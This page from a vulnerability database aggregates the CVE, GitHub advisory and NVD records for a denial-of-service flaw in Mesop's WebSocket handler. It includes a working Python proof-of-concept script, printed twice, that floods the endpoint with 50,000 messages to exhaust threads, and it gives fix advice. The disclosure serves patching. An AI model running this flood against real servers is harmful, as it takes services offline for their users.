Vulnerability-Lookup

CVE-2026-34824 (GCVE-0-2026-34824)

Vulnerability from cvelistv5 – Published: 2026-04-03 22:41 – Updated: 2026-04-06 15:42

Title

Mesop: Unbounded Thread Creation in WebSocket Handler Leads to Denial of Service

Summary

Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-125 - Out-of-bounds Read

Assigner

GitHub_M

References

URL

Tags

	https://github.com/mesop-dev/mesop/security/advis…	x_refsource_CONFIRM
	https://github.com/mesop-dev/mesop/commit/760a207…	x_refsource_MISC
	https://github.com/mesop-dev/mesop/releases/tag/v1.2.5	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	mesop-dev	mesop	Affected: >= 1.2.3, < 1.2.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-34824",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-06T15:36:21.198461Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-06T15:42:06.793Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "mesop",
          "vendor": "mesop-dev",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.2.3, \u003c 1.2.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-125",
              "description": "CWE-125: Out-of-bounds Read",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-03T22:41:34.828Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679"
        },
        {
          "name": "https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987"
        },
        {
          "name": "https://github.com/mesop-dev/mesop/releases/tag/v1.2.5",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/mesop-dev/mesop/releases/tag/v1.2.5"
        }
      ],
      "source": {
        "advisory": "GHSA-3jr7-6hqp-x679",
        "discovery": "UNKNOWN"
      },
      "title": "Mesop: Unbounded Thread Creation in WebSocket Handler Leads to Denial of Service"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-34824",
    "datePublished": "2026-04-03T22:41:34.828Z",
    "dateReserved": "2026-03-30T20:52:53.283Z",
    "dateUpdated": "2026-04-06T15:42:06.793Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-34824",
      "date": "2026-04-26",
      "epss": "0.00028",
      "percentile": "0.07959"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-34824\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-03T23:17:05.213\",\"lastModified\":\"2026-04-13T17:28:47.427\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-125\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:mesop-dev:mesop:*:*:*:*:*:python:*:*\",\"versionStartIncluding\":\"1.2.3\",\"versionEndExcluding\":\"1.2.5\",\"matchCriteriaId\":\"4769E8D1-F88C-4A75-8FAF-134F1A0B7DE0\"}]}]}],\"references\":[{\"url\":\"https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/mesop-dev/mesop/releases/tag/v1.2.5\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-34824\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-06T15:36:21.198461Z\"}}}], \"references\": [{\"url\": \"https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-06T15:36:29.638Z\"}}], \"cna\": {\"title\": \"Mesop: Unbounded Thread Creation in WebSocket Handler Leads to Denial of Service\", \"source\": {\"advisory\": \"GHSA-3jr7-6hqp-x679\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"mesop-dev\", \"product\": \"mesop\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.2.3, \u003c 1.2.5\"}]}], \"references\": [{\"url\": \"https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679\", \"name\": \"https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987\", \"name\": \"https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/mesop-dev/mesop/releases/tag/v1.2.5\", \"name\": \"https://github.com/mesop-dev/mesop/releases/tag/v1.2.5\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-125\", \"description\": \"CWE-125: Out-of-bounds Read\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-03T22:41:34.828Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-34824\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-06T15:42:06.793Z\", \"dateReserved\": \"2026-03-30T20:52:53.283Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-03T22:41:34.828Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-3JR7-6HQP-X679

Vulnerability from github – Published: 2026-04-03 21:54 – Updated: 2026-04-06 23:11

Summary

Mesop: Unbounded Thread Creation in WebSocket Handler Leads to Denial of Service

Details

Summary

An uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework.

Details

The vulnerability stems from an architectural flaw in how incoming WebSocket messages are processed. In the mesop/server/server.py file, the handle_websocket function listens for incoming messages and immediately spawns a new threading.Thread for every successfully parsed ui_request.

There is no thread pool, message queue, or rate-limiting mechanism implemented to restrict the number of concurrent threads spawned per connection.

Vulnerable code snippet in mesop/server/server.py:

while True:
    message = ws.receive()
    if not message:
        continue
    # ... message parsing logic ...

    # VULNERABILITY: Spawning a new thread for every single message without limits
    thread = threading.Thread(
        target=copy_current_request_context(ws_generate_data),
        args=(ws, ui_request),
        daemon=True,
    )
    thread.start()

PoC

To reproduce this vulnerability, you only need a running instance of a Mesop application and a basic Python script to flood the WebSocket endpoint.

Prerequisites:

Python environment with the websocket-client library installed (pip install websocket-client).

A target Mesop application running locally (e.g., http://localhost:8080).

Steps to reproduce:

Start the target Mesop application.

Save the following script as exploit_dos.py.

Run the script: python exploit_dos.py. Watch the server's resource monitor; memory and thread counts will spike rapidly until the process crashes.

import websocket
import base64

# Replace with the target Mesop application's WebSocket URL
TARGET_WS_URL = "ws://localhost:8080/__ui__"

# A minimal valid base64 payload to bypass `base64.urlsafe_b64decode` 
# and Protobuf `ParseFromString` without throwing a parsing exception.
EMPTY_UI_REQUEST_B64 = base64.urlsafe_b64encode(b'').decode('utf-8')

def flood_server():
    ws = websocket.WebSocket()
    try:
        ws.connect(TARGET_WS_URL)
        print("[+] Connection established. Initiating thread exhaustion attack...")

        # Rapidly send 50,000 messages to force the server to spawn 50,000 threads
        for i in range(50000):
            ws.send(EMPTY_UI_REQUEST_B64)

        print("[+] Payloads sent. The server should be unresponsive or crashed by now.")
        ws.close()
    except Exception as e:
        print(f"[-] Connection closed or server crashed: {e}")

if __name__ == "__main__":
    flood_server()

Impact

Vulnerability Type: Denial of Service (DoS) / CWE-400: Uncontrolled Resource Consumption.

Impacted Parties: Any developer or organization deploying a Mesop-based application to a publicly accessible network.

Severity: High. An unauthenticated external attacker can completely crash the application within seconds using minimal bandwidth from a single machine, rendering the service unavailable to all legitimate users.

Mitigation (Recommended Fixes):

Use a bounded thread pool (e.g., ThreadPoolExecutor with max_workers) Introduce per-connection rate limiting Implement a message queue with backpressure Consider migrating to an async event loop model instead of spawning OS threads

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mesop"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.2.3"
            },
            {
              "fixed": "1.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34824"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-125",
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-03T21:54:36Z",
    "nvd_published_at": "2026-04-03T23:17:05Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework.\n\n### Details\nThe vulnerability stems from an architectural flaw in how incoming WebSocket messages are processed. In the `mesop/server/server.py` file, the `handle_websocket` function listens for incoming messages and immediately spawns a new `threading.Thread` for every successfully parsed `ui_request`.\n\nThere is no thread pool, message queue, or rate-limiting mechanism implemented to restrict the number of concurrent threads spawned per connection. \n\n*Vulnerable code snippet in `mesop/server/server.py`:*\n```python\nwhile True:\n    message = ws.receive()\n    if not message:\n        continue\n    # ... message parsing logic ...\n\n    # VULNERABILITY: Spawning a new thread for every single message without limits\n    thread = threading.Thread(\n        target=copy_current_request_context(ws_generate_data),\n        args=(ws, ui_request),\n        daemon=True,\n    )\n    thread.start()\n```\n### PoC\nTo reproduce this vulnerability, you only need a running instance of a Mesop application and a basic Python script to flood the WebSocket endpoint.\n\nPrerequisites:\n\nPython environment with the `websocket-client library` installed (`pip install websocket-client`).\n\nA target Mesop application running locally (e.g., `http://localhost:8080`).\n\nSteps to reproduce:\n\nStart the target Mesop application.\n\nSave the following script as `exploit_dos.py`.\n\nRun the script: python `exploit_dos.py`. Watch the server\u0027s resource monitor; memory and thread counts will spike rapidly until the process crashes.\n\n```\nimport websocket\nimport base64\n\n# Replace with the target Mesop application\u0027s WebSocket URL\nTARGET_WS_URL = \"ws://localhost:8080/__ui__\"\n\n# A minimal valid base64 payload to bypass `base64.urlsafe_b64decode` \n# and Protobuf `ParseFromString` without throwing a parsing exception.\nEMPTY_UI_REQUEST_B64 = base64.urlsafe_b64encode(b\u0027\u0027).decode(\u0027utf-8\u0027)\n\ndef flood_server():\n    ws = websocket.WebSocket()\n    try:\n        ws.connect(TARGET_WS_URL)\n        print(\"[+] Connection established. Initiating thread exhaustion attack...\")\n        \n        # Rapidly send 50,000 messages to force the server to spawn 50,000 threads\n        for i in range(50000):\n            ws.send(EMPTY_UI_REQUEST_B64)\n            \n        print(\"[+] Payloads sent. The server should be unresponsive or crashed by now.\")\n        ws.close()\n    except Exception as e:\n        print(f\"[-] Connection closed or server crashed: {e}\")\n\nif __name__ == \"__main__\":\n    flood_server()\n```\n### Impact\nVulnerability Type: Denial of Service (DoS) / CWE-400: Uncontrolled Resource Consumption.\n\nImpacted Parties: Any developer or organization deploying a Mesop-based application to a publicly accessible network.\n\nSeverity: High. An unauthenticated external attacker can completely crash the application within seconds using minimal bandwidth from a single machine, rendering the service unavailable to all legitimate users.\n\n### Mitigation (Recommended Fixes):\n\nUse a bounded thread pool (e.g., ThreadPoolExecutor with max_workers)\nIntroduce per-connection rate limiting\nImplement a message queue with backpressure\nConsider migrating to an async event loop model instead of spawning OS threads",
  "id": "GHSA-3jr7-6hqp-x679",
  "modified": "2026-04-06T23:11:36Z",
  "published": "2026-04-03T21:54:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34824"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mesop-dev/mesop"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mesop-dev/mesop/releases/tag/v1.2.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mesop: Unbounded Thread Creation in WebSocket Handler Leads to Denial of Service"
}

FKIE_CVE-2026-34824

Vulnerability from fkie_nvd - Published: 2026-04-03 23:17 - Updated: 2026-04-13 17:28

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987	Patch
security-advisories@github.com	https://github.com/mesop-dev/mesop/releases/tag/v1.2.5	Product, Release Notes
security-advisories@github.com	https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679	Exploit, Mitigation, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	mesop-dev	mesop	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:mesop-dev:mesop:*:*:*:*:*:python:*:*",
              "matchCriteriaId": "4769E8D1-F88C-4A75-8FAF-134F1A0B7DE0",
              "versionEndExcluding": "1.2.5",
              "versionStartIncluding": "1.2.3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Mesop is a Python-based UI framework that allows users to build web applications. From version 1.2.3 to before version 1.2.5, an uncontrolled resource consumption vulnerability exists in the WebSocket implementation of the Mesop framework. An unauthenticated attacker can send a rapid succession of WebSocket messages, forcing the server to spawn an unbounded number of operating system threads. This leads to thread exhaustion and Out of Memory (OOM) errors, causing a complete Denial of Service (DoS) for any application built on the framework. This issue has been patched in version 1.2.5."
    }
  ],
  "id": "CVE-2026-34824",
  "lastModified": "2026-04-13T17:28:47.427",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-03T23:17:05.213",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/mesop-dev/mesop/commit/760a2079b5c609038c826d24dfbcf9b0be98d987"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/mesop-dev/mesop/releases/tag/v1.2.5"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-3jr7-6hqp-x679"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-125"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-770"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-34824 (GCVE-0-2026-34824)

GHSA-3JR7-6HQP-X679

Summary

Details

PoC

Impact

Mitigation (Recommended Fixes):

FKIE_CVE-2026-34824

Tags

Sightings

Nomenclature